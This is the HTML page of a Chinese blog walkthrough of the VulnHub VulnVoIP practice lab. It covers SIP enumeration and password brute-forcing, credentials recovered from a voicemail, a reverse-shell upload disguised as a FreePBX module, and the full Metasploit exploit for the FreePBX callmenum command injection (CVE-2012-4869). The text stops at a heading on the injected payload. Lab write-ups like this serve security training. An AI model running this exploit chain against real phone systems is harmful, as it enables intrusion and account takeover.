  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_a0oqhord1y';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://example.com';</script>
  <title>
    VulnHub HackLAB：VulnVoIP | 雾島风起時
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_a0oqhord1y.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="HackLAB: VulnVoIP项目地址：https:&#x2F;&#x2F;download.vulnhub.com&#x2F;hacklab&#x2F;vulnVoIP.7z 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  基于 FreePBX (HTTP 80) + Asterisk (5038) + MySQL (3306)，AI 分析给出是 PBX">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub HackLAB：VulnVoIP">
<meta property="og:url" content="http://example.com/2026/04/01/HackLAB%20VulnVoIP/index.html">
<meta property="og:site_name" content="雾島风起時">
<meta property="og:description" content="HackLAB: VulnVoIP项目地址：https:&#x2F;&#x2F;download.vulnhub.com&#x2F;hacklab&#x2F;vulnVoIP.7z 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  基于 FreePBX (HTTP 80) + Asterisk (5038) + MySQL (3306)，AI 分析给出是 PBX">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6978b80f9ca240b15f5cc80b.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794222a3d6d770e81d861a.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69795037a3d6d770e81d870a.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697950b5a3d6d770e81d8715.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69795165a3d6d770e81d8717.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6979519ca3d6d770e81d874e.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794916a3d6d770e81d8692.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794a93a3d6d770e81d86b6.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697952cca3d6d770e81d87ae.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794b55a3d6d770e81d86c8.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794beca3d6d770e81d86d4.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794bd4a3d6d770e81d86d3.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697abf59e6c1ecde597e6fad.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794c35a3d6d770e81d86e0.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69794cb1a3d6d770e81d86ec.png">
<meta property="article:published_time" content="2026-04-01T08:13:00.000Z">
<meta property="article:modified_time" content="2026-04-04T08:38:54.770Z">
<meta property="article:author" content="ALL">
<meta property="article:tag" content="NMap 交互模式提权">
<meta property="article:tag" content="Python 升级为交互式 Shell">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="弱口令">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/6978b80f9ca240b15f5cc80b.png">
    <link rel="alternate" href="/atom.xml" title="雾島风起時" type="application/atom+xml">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/archives">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/about">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">关于</span>
        </a>
        <a class="main-nav-link-wrap" href="/friend">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">友链</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" aria-label="RSS 订阅" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
        <picture>
        </picture>
          <img  fetchpriority="high" src="/images/banner.webp" alt="VulnHub HackLAB：VulnVoIP">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">VulnHub HackLAB：VulnVoIP</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackLAB-VulnVoIP"><span class="toc-number">1.</span> <span class="toc-text">HackLAB: VulnVoIP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">1.1.</span> <span class="toc-text">弱口令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Asterisk-PBX"><span class="toc-number">1.1.1.</span> <span class="toc-text">Asterisk PBX</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FreePBX"><span class="toc-number">1.1.2.</span> <span class="toc-text">FreePBX</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE"><span class="toc-number">1.2.</span> <span class="toc-text">RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Upload-moudule%EF%BC%88-tgz-%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.2.1.</span> <span class="toc-text">Upload moudule（.tgz 绕过）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#freepbx-callmenum%EF%BC%882012-4869%EF%BC%89"><span class="toc-number">1.2.2.</span> <span class="toc-text">freepbx_callmenum（2012-4869）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Python-%E5%8D%87%E7%BA%A7%E4%B8%BA%E4%BA%A4%E4%BA%92%E5%BC%8F-Shell"><span class="toc-number">1.3.1.</span> <span class="toc-text">Python 升级为交互式 Shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NMap-%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.2.</span> <span class="toc-text">NMap 交互模式提权</span></a></li></ol></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">51</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">98</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-HackLAB VulnVoIP" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-04-01T08:13:00.000Z" itemprop="datePublished">2026-04-01</time>
    <time style="display: none;" id="post-update-time">2026-04-04</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h1 id="HackLAB-VulnVoIP"><a href="#HackLAB-VulnVoIP" class="headerlink" title="HackLAB: VulnVoIP"></a>HackLAB: VulnVoIP</h1><p>项目地址：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/hacklab/vulnVoIP.7z">https://download.vulnhub.com/hacklab/vulnVoIP.7z</a></p>
<p>是一个打包好的镜像文件</p>
<p><strong>注意：导入 vmx 时一定要选择我已移动，否则没网</strong></p>
<p>使用 Nmap 扫描出开放服务及操作系统版本</p>
<p><img src="https://pic1.imgdb.cn/item/6978b80f9ca240b15f5cc80b.png"></p>
<p>基于 FreePBX (HTTP 80) + Asterisk (5038) + MySQL (3306)，AI 分析给出是 PBX 网络电话系统</p>
<p>对于这种终端设备，我们可以使用工具 <code>svmap</code> 扫描拿到精确的版本，<a target="_blank" rel="noopener" href="https://github.com/EnableSecurity/sipvicious">下载地址</a></p>
<p><code>svmap</code> 是 <strong>SIPVicious</strong> 工具集中的核心扫描器，其本质是一个 <strong>SIP 协议扫描器</strong>。它的唯一目标是定位正在监听 SIP 消息的活跃设备，并获取它们的详细身份信息</p>
<p>在 SIP 协议中，<strong><code>User-Agent</code></strong> 和 <strong><code>Server</code></strong> 这两个头部字段类似于 HTTP 协议，其作用是指明发送请求或生成响应的 SIP 用户代理软件（UA）或服务器软件的名称和版本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">SIP/2.0 200 OK</span><br><span class="line">Via: SIP/2.0/UDP 192.168.202.x:5060;branch=z9hG4bK...</span><br><span class="line">From: &lt;sip:100@192.168.202.x&gt;;tag=as12345</span><br><span class="line">To: &lt;sip:192.168.202.159&gt;;tag=as67890</span><br><span class="line">Call-ID: abc12345</span><br><span class="line">CSeq: 101 OPTIONS</span><br><span class="line">Server: Asterisk PBX 1.6.0.26-sme  &lt;-- 【关键信息在这里！】</span><br><span class="line">Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY</span><br><span class="line">Supported: replaces</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m sipvicious.svmap 192.168.202.159</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69794222a3d6d770e81d861a.png"></p>
<p>虽然知道是 PBX，但我们不知道内部具体的<strong>分机号</strong>是多少。没有分机号，就无法进行后续的密码爆破或呼叫劫持</p>
<p><code>svwar</code> 是 SIPVicious 工具集中的<strong>分机枚举工具</strong>，它的主要作用是通过暴力破解或顺序扫描的方式，识别出目标 PBX 系统中真实存在的用户账号（分机号）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -D (Auto-Detect)： 它让工具先发送一个探测包，自动检测目标服务器在面对不存在的分机时会返回什么样的错误码（比如 404 Not Found 或 401 Unauthorized）</span></span><br><span class="line"><span class="comment"># -m INVITE (Request Method)： 指定探测方法为 INVITE。默认情况下 svwar 使用 REGISTER</span></span><br><span class="line"><span class="comment"># 因为某些加固过的服务器会严格审计 REGISTER 请求并封禁异常 IP，但对于 INVITE（发起呼叫）通常更宽松</span></span><br><span class="line">svwar -D -mINVITE 192.168.202.159</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69795037a3d6d770e81d870a.png"></p>
<p>爆破密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m sipvicious.svcrack -u 2000 -d /usr/share/wordlists/rockyou.txt 192.168.202.159</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/697950b5a3d6d770e81d8715.png"></p>
<p>安装 x-lite，把网络设置为桥接</p>
<h2 id="弱口令"><a href="#弱口令" class="headerlink" title="弱口令"></a>弱口令</h2><h3 id="Asterisk-PBX"><a href="#Asterisk-PBX" class="headerlink" title="Asterisk PBX"></a>Asterisk PBX</h3><p>用户 2000，密码 password123</p>
<p><img src="https://pic1.imgdb.cn/item/69795165a3d6d770e81d8717.png"></p>
<p>输入密码 0000，然后再按 1，听第一条信息</p>
<p><img src="https://pic1.imgdb.cn/item/6979519ca3d6d770e81d874e.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">…Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123 all one word and lowercase. You can log on at the usual address. See you in the morning…</span><br></pre></td></tr></table></figure>

<h3 id="FreePBX"><a href="#FreePBX" class="headerlink" title="FreePBX"></a>FreePBX</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">support:securesupport123</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69794916a3d6d770e81d8692.png"></p>
<h2 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h2><h3 id="Upload-moudule（-tgz-绕过）"><a href="#Upload-moudule（-tgz-绕过）" class="headerlink" title="Upload moudule（.tgz 绕过）"></a>Upload moudule（.tgz 绕过）</h3><p>找到一个文件上传模块在 Module Admin 中</p>
<p><img src="https://pic1.imgdb.cn/item/69794a93a3d6d770e81d86b6.png"></p>
<p>只能上传压缩文件，绕过方式如下</p>
<ol>
<li>选创建一个文件夹</li>
<li>将反弹 Shell 放入其中</li>
<li>打包成 shell-1.0.tgz 的形式，使用 <code>tar -czvf</code> 命令（带 -1.0 是要符合网站命令规范）</li>
</ol>
<p><img src="https://pic1.imgdb.cn/item/697952cca3d6d770e81d87ae.png"></p>
<p>上传成功</p>
<p><img src="https://pic1.imgdb.cn/item/69794b55a3d6d770e81d86c8.png"></p>
<p>扫描后台找到上传的位置</p>
<p><img src="https://pic1.imgdb.cn/item/69794beca3d6d770e81d86d4.png"></p>
<p>进去后看到压缩文件被自动解压缩了</p>
<p><img src="https://pic1.imgdb.cn/item/69794bd4a3d6d770e81d86d3.png"></p>
<h3 id="freepbx-callmenum（2012-4869）"><a href="#freepbx-callmenum（2012-4869）" class="headerlink" title="freepbx_callmenum（2012-4869）"></a>freepbx_callmenum（2012-4869）</h3><p>MSF 搜索相关漏洞</p>
<p><img src="https://pic1.imgdb.cn/item/697abf59e6c1ecde597e6fad.png"></p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MetasploitModule</span> &lt; <span class="title class_ inherited__">Msf::Exploit::Remote</span></span><br><span class="line">  <span class="title class_">Rank</span> = <span class="title class_">ManualRanking</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">include</span> <span class="title class_">Msf::Exploit::Remote::HttpClient</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">def</span> <span class="title function_">initialize</span>(<span class="params">info = &#123;&#125;</span>)</span><br><span class="line">    <span class="variable language_">super</span>(</span><br><span class="line">      update_info(</span><br><span class="line">        info,</span><br><span class="line">        <span class="string">&#x27;Name&#x27;</span> =&gt; <span class="string">&#x27;FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Description&#x27;</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">          This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.</span></span><br><span class="line"><span class="string">          Due to the way callme_page.php handles the &#x27;callmenum&#x27; parameter, it</span></span><br><span class="line"><span class="string">          is possible to inject code to the &#x27;$channel&#x27; variable in function</span></span><br><span class="line"><span class="string">          callme_startcall in order to gain remote code execution.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">          Please note in order to use this module properly, you must know the</span></span><br><span class="line"><span class="string">          extension number, which can be enumerated or bruteforced, or you may</span></span><br><span class="line"><span class="string">          try some of the default extensions such as 0 or 200.  Also, the call</span></span><br><span class="line"><span class="string">          has to be answered (or go to voice).</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">          Tested on both Elastix and FreePBX ISO image installs.</span></span><br><span class="line"><span class="string">        &#125;</span>,</span><br><span class="line">        <span class="string">&#x27;Author&#x27;</span> =&gt; [ <span class="string">&#x27;muts&#x27;</span>, <span class="string">&#x27;Martin Tschirsich&#x27;</span> ],</span><br><span class="line">        <span class="string">&#x27;License&#x27;</span> =&gt; <span class="variable constant_">MSF_LICENSE</span>,</span><br><span class="line">        <span class="string">&#x27;References&#x27;</span> =&gt; [</span><br><span class="line">          [ <span class="string">&#x27;CVE&#x27;</span>, <span class="string">&#x27;2012-4869&#x27;</span> ],</span><br><span class="line">          [ <span class="string">&#x27;OSVDB&#x27;</span>, <span class="string">&#x27;80544&#x27;</span> ],</span><br><span class="line">          [ <span class="string">&#x27;EDB&#x27;</span>, <span class="string">&#x27;18649&#x27;</span> ]</span><br><span class="line">        ],</span><br><span class="line">        <span class="string">&#x27;Platform&#x27;</span> =&gt; [<span class="string">&#x27;unix&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;Arch&#x27;</span> =&gt; <span class="variable constant_">ARCH_CMD</span>,</span><br><span class="line">        <span class="string">&#x27;Privileged&#x27;</span> =&gt; <span class="literal">false</span>,</span><br><span class="line">        <span class="string">&#x27;Payload&#x27;</span> =&gt; &#123;</span><br><span class="line">          <span class="string">&#x27;Space&#x27;</span> =&gt; <span class="number">1024</span>,</span><br><span class="line">          <span class="string">&#x27;DisableNops&#x27;</span> =&gt; <span class="literal">true</span>,</span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="string">&#x27;Targets&#x27;</span> =&gt; [</span><br><span class="line">          [ <span class="string">&#x27;Automatic Target&#x27;</span>, &#123;&#125;]</span><br><span class="line">        ],</span><br><span class="line">        <span class="string">&#x27;DefaultTarget&#x27;</span> =&gt; <span class="number">0</span>,</span><br><span class="line">        <span class="string">&#x27;DisclosureDate&#x27;</span> =&gt; <span class="string">&#x27;2012-03-20&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Notes&#x27;</span> =&gt; &#123;</span><br><span class="line">          <span class="string">&#x27;Reliability&#x27;</span> =&gt; <span class="variable constant_">UNKNOWN_RELIABILITY</span>,</span><br><span class="line">          <span class="string">&#x27;Stability&#x27;</span> =&gt; <span class="variable constant_">UNKNOWN_STABILITY</span>,</span><br><span class="line">          <span class="string">&#x27;SideEffects&#x27;</span> =&gt; <span class="variable constant_">UNKNOWN_SIDE_EFFECTS</span></span><br><span class="line">        &#125;</span><br><span class="line">      )</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    register_options(</span><br><span class="line">      [</span><br><span class="line">        <span class="title class_">OptString</span>.new(<span class="string">&quot;EXTENSION&quot;</span>, [ <span class="literal">true</span>, <span class="string">&quot;A range of Local extension numbers&quot;</span>, <span class="string">&quot;0-100&quot;</span> ]),</span><br><span class="line">      ]</span><br><span class="line">    )</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">def</span> <span class="title function_">exploit</span></span><br><span class="line">    <span class="comment"># Check range input</span></span><br><span class="line">    <span class="keyword">if</span> datastore[<span class="string">&#x27;EXTENSION&#x27;</span>] =~ <span class="regexp">/^(\d+)\-(\d+)$/</span></span><br><span class="line">      min = <span class="variable">$1</span>.to_i</span><br><span class="line">      max = <span class="variable">$2</span>.to_i</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      print_error(<span class="string">&quot;Please specify a range for option &#x27;EXTENSION&#x27;&quot;</span>)</span><br><span class="line">      <span class="keyword">return</span></span><br><span class="line">    <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">    cmd = <span class="title class_">Rex</span><span class="symbol">:</span><span class="symbol">:Text</span>.uri_encode(payload.encoded)</span><br><span class="line"></span><br><span class="line">    (min..max).each <span class="keyword">do</span> |<span class="params">e</span>|</span><br><span class="line">      connect</span><br><span class="line">      print_status(<span class="string">&quot;<span class="subst">#&#123;rhost&#125;</span>:<span class="subst">#&#123;rport&#125;</span> - Sending evil request with range <span class="subst">#&#123;e.to_s&#125;</span>&quot;</span>)</span><br><span class="line">      res = send_request_raw(&#123;</span><br><span class="line">        <span class="string">&#x27;method&#x27;</span> =&gt; <span class="string">&#x27;GET&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;uri&#x27;</span> =&gt; <span class="string">&quot;/recordings/misc/callme_page.php?action=c&amp;callmenum=&quot;</span> + e.to_s + <span class="string">&quot;@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20<span class="subst">#&#123;cmd&#125;</span>%0D%0A%0D%0A&quot;</span>,</span><br><span class="line">        <span class="string">&#x27;version&#x27;</span> =&gt; <span class="string">&#x27;1.0&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;vhost&#x27;</span> =&gt; rhost</span><br><span class="line">      &#125;)</span><br><span class="line">      handler</span><br><span class="line">      disconnect</span><br><span class="line">    <span class="keyword">end</span></span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>

<p>该漏洞存在于 <code>callme_page.php</code> 脚本中</p>
<p>当用户调用该页面时，系统会尝试启动一个呼叫任务，而关键参数 <code>callmenum</code> 没有经过任何过滤，就直接参与了 <strong>Asterisk 呼叫文件（Call File）</strong> 的拼接</p>
<p>Asterisk 系统使用一种特定格式的文本文件（通常位于 <code>/var/spool/asterisk/outgoing/</code>）来发起呼叫</p>
<p>这些文件的格式是基于 <code>Key: Value</code> 的</p>
<p>生成呼叫逻辑是：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Channel</span><span class="punctuation">: </span>Local/200@from-internal/n</span><br><span class="line"><span class="attribute">Application</span><span class="punctuation">: </span>Playback</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>注入的 Payload</p>
